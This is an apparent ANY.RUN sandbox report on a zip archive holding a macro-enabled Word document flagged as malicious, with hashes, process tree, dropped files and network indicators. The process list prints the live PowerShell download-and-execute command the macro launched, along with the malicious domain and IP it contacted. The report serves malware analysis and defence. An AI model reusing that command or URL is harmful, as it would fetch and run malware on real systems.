analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan3181874.zip

Full analysis: https://app.any.run/tasks/f2dff402-7be9-4182-816b-801d2e972564
Verdict: Malicious activity
Analysis date: October 14, 2019, 07:29:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-4
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

6894CB6E76D0557265ACD09D525BDBD9

SHA1:

EB0B36D542307EAEEE26DC7E74EBACCDDE8B144E

SHA256:

13EF390EA07FC39446764BE6ACEA0D7553D293087955DD522B78D96631C68258

SSDEEP:

3072:OOb7kTCMYsocWycwdtQNclQfIkIqWDEcAbmcMG6pMFesZZz:OO8vYsohhwoNcl4bIqWDEcAKc+MFZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1608)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1608)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2548)
    • Creates files in the user directory

      • powershell.exe (PID: 3992)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1608)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1608)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 06:12:00
ZipCRC: 0x90cf554e
ZipCompressedSize: 150586
ZipUncompressedSize: 8388609
ZipFileName: Nuovo_documento_68.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2548"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Scan3181874.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
1608"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2548.19391\Nuovo_documento_68.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3992"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 293
Read events
1 549
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2548WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2548.19391\Nuovo_documento_68.doc
MD5:
SHA256:
1608WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCBC6.tmp.cvr
MD5:
SHA256:
3992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AAVMZUV814N0O8IG5YR9.temp
MD5:
SHA256:
3992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1608WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIa2548.19391\~$ovo_documento_68.docpgc
MD5:9DF214930BE9217BF7A1972E4D1AFD79
SHA256:0AAE7B7B1C5C01B2E13273F60F902E50F1554F4226A926CB973E82929AEB1B62
1608WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D1F9B9506BA1FF376B6718DE339C48E9
SHA256:90BA669D84851D9CBDC6CB3CB8959FFB4BF569EA5233F9FD8B42C407915EE3B3
3992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39d79e.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3992
powershell.exe
GET
185.189.151.22:80
http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997
CH
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3992
powershell.exe
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
jes.dhinsuranceservices.com
  • 185.189.151.22
malicious

Threats

No threats detected
No debug info